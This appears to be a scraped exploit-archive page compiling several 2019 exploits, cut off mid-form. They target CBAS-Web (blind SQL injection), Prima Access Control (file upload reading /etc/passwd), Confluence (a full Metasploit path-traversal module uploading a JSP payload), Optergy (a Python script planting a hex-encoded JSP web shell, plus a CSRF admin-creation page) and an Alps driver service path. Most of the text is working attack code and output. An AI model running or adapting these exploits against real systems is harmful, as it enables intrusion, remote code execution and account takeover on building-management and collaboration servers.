ISHACK AI BOT

# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : N/A # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection # PoC (id param): http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

# Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tested on: NA # CVE : CVE-2019-9189 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Prima Access Control 2.3.35 Authenticated Stored XSS # PoC --- POST /bin/sysfcgi.fx HTTP/1.1 Host: 192.168.13.37 Connection: keep-alive Content-Length: 572 Origin: https://192.168.13.37 Session-ID: 5682699 User-Agent: Mozi-Mozi/44.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/html, */*; q=0.01 Session-Pc: 2 X-Requested-With: XMLHttpRequest Referer: https://192.168.13.37/app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: G_ENABLED_IDPS=google <requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python&#xA;#&#xA;# test script&#xA;#&#xA;&#xA;import sys,os&#xA;&#xA;with open("/etc/passwd") as f:&#xA; with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:&#xA; for line in f:&#xA; f1.write(line)&#xA;&#xA;&#xA;os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests> Result: $ curl https://192.168.13.37/app/images/logos/testingus2.txt root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:99:99:nobody:/home:/bin/false python:x:1000:1000:python:/home/python:/bin/false admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh uid=0(root) gid=0(root) groups=0(root),10(wheel) Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux

# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit) # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: max7253 # Vendor Homepage: https://www.atlassian.com # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: 6.15.1 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu # CVE : N/A ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)", 'Description' => %q{ To use this exploit you should specify the following variables: USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server. ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'. Typical ROOTFOLDER locations are: Windows: Program Files/Atlassian/Confluence/confluence/pages/ Linux: opt/atlassian/confluence/confluence/pages/ Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above). PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files. For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true. If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will try to create a new space and create a Page ID there. If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range. The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the 'Download all' action to place the shellcode to the root directory of the web server. Tested on Atlassian v6.15.1. on Linux and Windows. Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5. }, 'License' => MSF_LICENSE, 'Author' => [ 'Maxim Guslyaev' # Metasploit module ], 'References' => [ [ 'CVE', '2019-3398' ], [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ], [ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181'], [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398'] ], 'Privileged' => false, 'Platform' => %w{ linux win }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_JAVA }], [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_JAVA }] ], 'DefaultOptions' => { 'RPORT' => 8090, 'SSL' => false }, 'DisclosureDate' => 'Nov 9 2019', 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']), OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']), OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']), #OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']), OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']), OptString.new('TARGETURI', [true, 'The base to Confluence', '/']), OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']), OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]), OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']), OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']), ], self.class) end def do_authenticate print_status("Sending POST request to the web application (authentication)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/dologin.action'), 'method' => 'POST', 'vars_post' => { 'os_username' => datastore['USERNAME'], 'os_password' => datastore['PASSWORD'], 'os_destination' => '', 'login' => 'Log+In' } }) if res.nil? print_status("Unable to access the web application!") return 0 end @sessid = get_sid(res) if @sessid.nil? print_status("Unable to retrieve session ID!") return 0 end print_status("Getting Session ID from the web application... #{@sessid}") if res && res.redirect? location = res.redirection if location.nil? print_status("Unable to access the web application when redirected!") return 0 end res = send_request_cgi!({ 'uri' => normalize_uri(target_uri.path.to_s, location.to_s), 'method' => 'GET', 'headers' => { 'Cookie' => @sessid } }, redirect_depth = 5) end if res && res.code == 200 if res.body =~ /re-enter\syour\slogin/ || res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ || res.body =~ /Unauthorized/ print_status("Authentication failed...") return 0 end @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content'] if @xsrf_token.nil? or @xsrf_token.blank? print_status("Failed to retrieve XSRF token...") return 0 else print_status("Retrieving XSRF token... #{@xsrf_token}") return 1 end else print_status("Unexpected response from the web application...") return 0 end end def do_upload(_pageid) print_status("Sending POST request to the web application (shellcode upload)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'), 'method' => 'POST', 'vars_get' => { 'pageId' => _pageid, 'filename' => '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'], 'size' => payload.encoded.length, 'mimeType' => 'text/plain', 'spaceKey' => 'isis', 'atl_token' => @xsrf_token, 'name' => datastore['FILENAME'] }, 'data' => payload.encoded, 'headers' => { 'Connection' => 'close', 'Accept' => '*/*', 'Accept-Encoding' => 'identity', 'Cookie' => @sessid, 'Content-Length' => payload.encoded.length, 'Content-Type' => 'text/plain' } }) if res && res.code == 200 && res.body.scan(/actionErrors/).blank? print_status("Shellcode uploaded...") return 1 else return 0 end end def do_downloadall(_pageid) for downloadall_iter in 1..10 print_status("Sending GET request to the web application (downloadall)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'), 'method' => 'GET', 'vars_get' => { 'pageId' => _pageid }, 'headers' => { 'Cookie' => @sessid } }) print_status("Sending GET request to the web application (shellcode invokation)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']), 'method' => 'GET', 'headers' => { 'Cookie' => @sessid } }, timeout = 10) if res && res.code == 200 print_status("Shellcode found...") return 1 else if downloadall_iter == 10 print_status("Shellcode not found...") return 0 end end end end def do_getspaces print_status("Sending GET request to the web application (getting available spaces)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'), 'method' => 'GET', 'headers' => { 'User-Agent' => 'python-requests/2.20.0', 'Cookie' => @sessid, 'Accept' => '*/*', 'Accept-Encoding' => 'identity', 'Content-Type' => 'application/json' } }) if res && res.code == 200 && res.body =~ /results/ space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten else space_list = Array([]) end return space_list end def do_createspace print_status("Sending POST request to the web application (creating a space)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'), 'method' => 'POST', 'data' => { "key": datastore['NEWSPACE'], "name": "Example space", "description": { "plain": { "value": "This is an example space", "representation": "plain" } }, "metadata": {} }.to_json, 'headers' => { 'User-Agent' => 'python-requests/2.20.0', 'Cookie' => @sessid, 'Accept-Encoding' => 'identity', 'Content-Type' => 'application/json' } }) if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/ print_status("Space created...") return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0] else print_status("Space not created...") return 0 end end def do_createpage(_space) print_status("Sending GET request to the web application (creating Page ID), space #{_space}...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey='+_space), 'method' => 'GET', 'headers' => { 'Cookie' => @sessid } }) if res && res.code == 200 && res.body =~ /ajs-draft-id/ pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content'] pageid_parsed = /(\d+)/.match(pageid) if pageid_parsed.nil? print_status("Unexpected Page ID format...") return 0 else print_status("Page ID created... #{pageid}") datastore['PAGEID'] = pageid return 1 end else return 0 end end def get_sid(res) if res.nil? return '' end res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || '' end def exploit print_status("Getting authenticated to the web application...") if do_authenticate != 1 fail_with(Failure::Unknown, 'Initial access or authentication error!') end unless datastore['PAGEID'].blank? if datastore['PAGEID'] == 0 print_status("Creating Page ID...") spaces = do_getspaces for sp in spaces if do_createpage(sp) == 1 print_status("Uploading shellcode...") if do_upload(datastore['PAGEID']) != 1 print_status("Failed to upload shellcode...") next end print_status("Invoking shellcode...") if do_downloadall(datastore['PAGEID']) != 1 print_status("Failed to invoke shellcode...") next else return end end end print_status("Trying to create a new space...") new_sp = do_createspace if new_sp != 0 if do_createpage(new_sp) == 1 print_status("Uploading shellcode...") if do_upload(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while uploading shellcode!') end print_status("Invoking shellcode...") if do_downloadall(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while invoking shellcode!') end return else fail_with(Failure::Unknown, 'Error while creating page in the newly created space!') end else fail_with(Failure::Unknown, 'Error while creating space!') end end print_status("Uploading shellcode...") if do_upload(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while uploading shellcode!') end print_status("Invoking shellcode...") if do_downloadall(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while invoking shellcode!') end else for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END'] print_status("Trying Page Id #{id}") print_status("Uploading shellcode...") if do_upload(id) == 1 print_status("Invoking shellcode...") if do_downloadall(id) == 1 break end end end end end def check res = send_request_cgi!({ 'uri' => normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'), 'method' => 'GET', }, redirect_depth = 5) if res && res.body =~ /Powered\sby/ ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0] print_status("The version of the web application is #{ver}") ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s) if ver_parsed.nil? print_status("The version of the web application couldn't be parsed") return Exploit::CheckCode::Detected end ver_oct1 = ver_parsed[1].to_i ver_oct2 = ver_parsed[2].to_i ver_oct3 = ver_parsed[3].to_i if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) || ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) || ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1) return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end end end

# Title: Optergy 2.3.0a - Remote Code Execution # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7274 #!/usr/bin/env python # -*- coding: utf8 -*- # ########################################################################## # # lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py # [+] Usage: optergy_rfm.py http://IP # [+] Example: optergy_rfm.py http://10.0.0.17 # # lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19 # Enter username: podroom # Enter password: podroom # # Welcome to Optergy HTTP Shell! # You can navigate to: http://192.168.232.19/images/jox.jsp # Or you can continue using this 'shell'. # Type 'exit' for exit. # # [email protected]:~# id # uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm) # [email protected]:~# sudo id # uid=0(root) gid=0(root) groups=0(root) # [email protected]:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp # # [email protected]:~# exit # Have a nice day! # ########################################################################## import requests import sys,os,time,re piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print "[+] Usage: " + piton + " http://IP" print "[+] Example: " + piton + " http://10.0.0.17\n" sys.exit() the_user = raw_input("Enter username: ") the_pass = raw_input("Enter password: ") the_host = sys.argv[1] odi = requests.Session() the_url = the_host + "/ajax/AjaxLogin.html?login" the_headers = {"Accept" : "*/*", "X-Requested-With" : "XMLHttpRequest", "User-Agent" : "Noproblem/16.0", "Content-Type" : "application/x-www-form-urlencoded", "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9"} the_data = {"username" : the_user, "password" : the_pass, "token" : ''} odi.post(the_url, headers = the_headers, data = the_data) the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64" "\x65\x72\x2e\x68\x74\x6d\x6c\x3f\x69\x64\x54\x6f\x55\x73\x65\x3d" "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30" "\x30\x32\x33\x36\x39\x39\x33\x39\x26\x64\x65\x63\x6f\x6d\x70\x72" "\x65\x73\x73\x3d\x66\x61\x6c\x73\x65\x26\x6f\x75\x74\x70\x75\x74" "\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x25\x32\x46\x75\x73\x72\x25" "\x32\x46\x6c\x6f\x63\x61\x6c\x25\x32\x46\x74\x6f\x6d\x63\x61\x74" "\x25\x32\x46\x77\x65\x62\x61\x70\x70\x73\x25\x32\x46\x52\x4f\x4f" "\x54\x25\x32\x46\x69\x6d\x61\x67\x65\x73\x25\x32\x46\x26\x66\x69" "\x6c\x65\x4e\x61\x6d\x65\x3d\x6a\x6f\x78\x2e\x6a\x73\x70")######" the_url = the_host + the_upl the_headers = {"Cache-Control" : "max-age=0", "Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl", "User-Agent" : "Noproblem/16.0", "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9"} the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d" "\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50" "\x59\x55\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" "\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66" "\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22" "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30" "\x30\x32\x33\x36\x39\x39\x33\x39\x22\x3b\x20\x66\x69\x6c\x65\x6e" "\x61\x6d\x65\x3d\x22\x6a\x6f\x78\x2e\x6a\x73\x70\x22\x0d\x0a\x43" "\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70" "\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73" "\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x3c\x25\x40\x20\x70\x61\x67" "\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e\x75" "\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a\x22" "\x25\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x3c\x42\x4f\x44\x59\x3e\x0a" "\x3c\x46\x4f\x52\x4d\x20\x4d\x45\x54\x48\x4f\x44\x3d\x22\x47\x45" "\x54\x22\x20\x4e\x41\x4d\x45\x3d\x22\x6d\x79\x66\x6f\x72\x6d\x22" "\x20\x41\x43\x54\x49\x4f\x4e\x3d\x22\x22\x3e\x0a\x3c\x49\x4e\x50" "\x55\x54\x20\x54\x59\x50\x45\x3d\x22\x74\x65\x78\x74\x22\x20\x4e" "\x41\x4d\x45\x3d\x22\x63\x6d\x64\x22\x3e\x0a\x3c\x49\x4e\x50\x55" "\x54\x20\x54\x59\x50\x45\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x20" "\x56\x41\x4c\x55\x45\x3d\x22\x53\x65\x6e\x64\x22\x3e\x0a\x3c\x2f" "\x46\x4f\x52\x4d\x3e\x0a\x3c\x70\x72\x65\x3e\x0a\x3c\x25\x0a\x69" "\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61" "\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x20\x21" "\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20" "\x20\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x43" "\x6f\x6d\x6d\x61\x6e\x64\x3a\x20\x22\x20\x2b\x20\x72\x65\x71\x75" "\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72" "\x28\x22\x63\x6d\x64\x22\x29\x20\x2b\x20\x22\x3c\x42\x52\x3e\x22" "\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x50\x72\x6f\x63\x65" "\x73\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67" "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63" "\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61" "\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x29\x3b\x0a\x20" "\x20\x20\x20\x20\x20\x20\x20\x4f\x75\x74\x70\x75\x74\x53\x74\x72" "\x65\x61\x6d\x20\x6f\x73\x20\x3d\x20\x70\x2e\x67\x65\x74\x4f\x75" "\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" "\x6d\x20\x69\x6e\x20\x3d\x20\x70\x2e\x67\x65\x74\x49\x6e\x70\x75" "\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x44\x61\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65" "\x61\x6d\x20\x64\x69\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74" "\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x69\x6e\x29" "\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\x74\x72\x69\x6e\x67" "\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64" "\x4c\x69\x6e\x65\x28\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20" "\x77\x68\x69\x6c\x65\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20" "\x6e\x75\x6c\x6c\x20\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x2e\x70\x72\x69" "\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x0a\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x73" "\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65" "\x28\x29\x3b\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d" "\x0a\x25\x3e\x0a\x3c\x2f\x70\x72\x65\x3e\x0a\x3c\x2f\x42\x4f\x44" "\x59\x3e\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a\x0a\x0a\x0d\x0a\x2d\x2d" "\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d\x42\x6f" "\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50\x59\x55" "\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72" "\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70" "\x6c\x6f\x61\x64\x22\x0d\x0a\x0d\x0a\x55\x70\x6c\x6f\x61\x64\x0d" "\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72" "\x6d\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51" "\x50\x59\x55\x4f\x44\x53\x57\x42\x6c\x2d\x2d\x0d\x0a")##########" odi.post(the_url, headers = the_headers, data = the_data) print "\nWelcome to Optergy HTTP Shell!" print "You can navigate to: " + the_host + "/images/jox.jsp" print "Or you can continue using this 'shell'." print "Type 'exit' for exit.\n" while True: try: cmd = raw_input("root@" + the_host[7:] + ":~# ") if cmd.strip() == "exit": print "Have a nice day!" break paramz = {"cmd" : cmd} # sudo cmd shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz) regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S) print regex.group(1).strip() except Exception: break sys.exit()

# Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path # Date: 2019-11-12 # Exploit Author: Mario Rodriguez # Vendor Homepage: https://www.alps.com/e/ # Software Link: https://www.alps.com/e/ # Version: 8.1202.1711.04 # Tested on: Windows 10 Home x64 Spanish #The Alps Pointing-device controller installs a service with an unquoted path #which could be used as a local privilege escalation vulnerability. To exploit this vulnerability, #an executable file could be placed in the path of the service and after rebooting the system or #restarting the service the malicious code will be executed with elevated privileges. #Step to discover the vulnerability C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto C:\Users\user>sc qc ApHidMonitorService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ApHidMonitorService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Alps HID Monitor Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin) # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7273 # Optergy Proton/Enterprise BMS CSRF Add Admin <!-- CSRF Add Admin Exploit --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST"> <input type="hidden" name="user.accountEnabled" value="true" /> <input type="hidden" name="user.username" value="testingus" /> <input type="hidden" name="user.password" value="testingus" /> <input type="hidden" name="confirmPassword" value="testingus" /> <input type="hidden" name="user.firstname" value="Tester" /> <input type="hidden" name="user.lastname" value="Testovski" /> <input type="hidden" name="user.companyName" value="TEST Inc." /> <input type="hidden" name="user.address" value="TestStr 17-251" /> <input type="hidden" name="user.emailAddress" value="[email protected]" /> <input type="hidden" name="user.departmentId" value="" /> <input type="hidden" name="user.phoneNumber" value="1112223333" /> <input type="hidden" name="user.mobileNumber" value="1233211234" /> <input type="hidden" name="securityLevel" value="10" /> <input type="hidden" name="user.showBanner" value="true" /> <input type="hidden" name="user.showMenu" value="true" /> <input type="hidden" name="user.showAlarmTab" value="true" /> <input type="hidden" name="user.visibleAlarms" value="0" /> <input type="hidden" name="user.showBookmarks" value="true" /> <input type="hidden" name="user.showNotificationTab" value="true" /> <input type="hidden" name="user.autoDismissFeedback" value="true" /> <input type="hidden" name="user.canChangeBookmarks" value="true" /> <input type="hidden" name="user.canChangePassword" value="true" /> <input type="hidden" name="user.canUpdateProfile" value="true" /> <input type="hidden" name="homepage-text" value="" /> <input type="hidden" name="user.homePageType" value="" /> <input type="hidden" name="user.homePage" value="" /> <input type="hidden" name="background" value="" /> <input type="hidden" name="user.backgroundImage-text" value="" /> <input type="hidden" name="user.backgroundImage" value="" /> <input type="hidden" name="user.backgroundTiled" value="" /> <input type="hidden" name="user.backgroundColour" value="" /> <input type="hidden" name="newMemberships" value="1" /> <input type="hidden" name="user.id" value="" /> <input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" /> <input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" /> <input type="hidden" name="newPrivileges" value="7" /> <input type="hidden" name="newPrivileges" value="9" /> <input type="hidden" name="newPrivileges" value="8" /> <input type="hidden" name="newPrivileges" value="10" /> <input type="hidden" name="newPrivileges" value="13" /> <input type="hidden" name="newPrivileges" value="14" /> <input type="hidden" name="newPrivileges" value="12" /> <input type="hidden" name="newPrivileges" value="2" /> <input type="hidden" name="newPrivileges" value="3" /> <input type="hidden" name="newPrivileges" value="4" /> <input type="hidden" name="newPrivileges" value="139" /> <input type="hidden" name="newPrivileges" value="138" /> <input type="hidden" name="newPrivileges" value="141" /> <input type="hidden" name="newPrivileges" value="140" /> <input type="hidden" name="newPrivileges" value="124" /> <input type="hidden" name="newPrivileges" value="128" /> <input type="hidden" name="newPrivileges" value="119" /> <input type="hidden" name="newPrivileges" value="19" /> <input type="hidden" name="newPrivileges" value="17" /> <input type="hidden" name="newPrivileges" value="18" /> <input type="hidden" name="newPrivileges" value="20" /> <input type="hidden" name="newPrivileges" value="21" /> <input type="hidden" name="newPrivileges" value="24" /> <input type="hidden" name="newPrivileges" value="23" /> <input type="hidden" name="newPrivileges" value="132" /> <input type="hidden" name="newPrivileges" 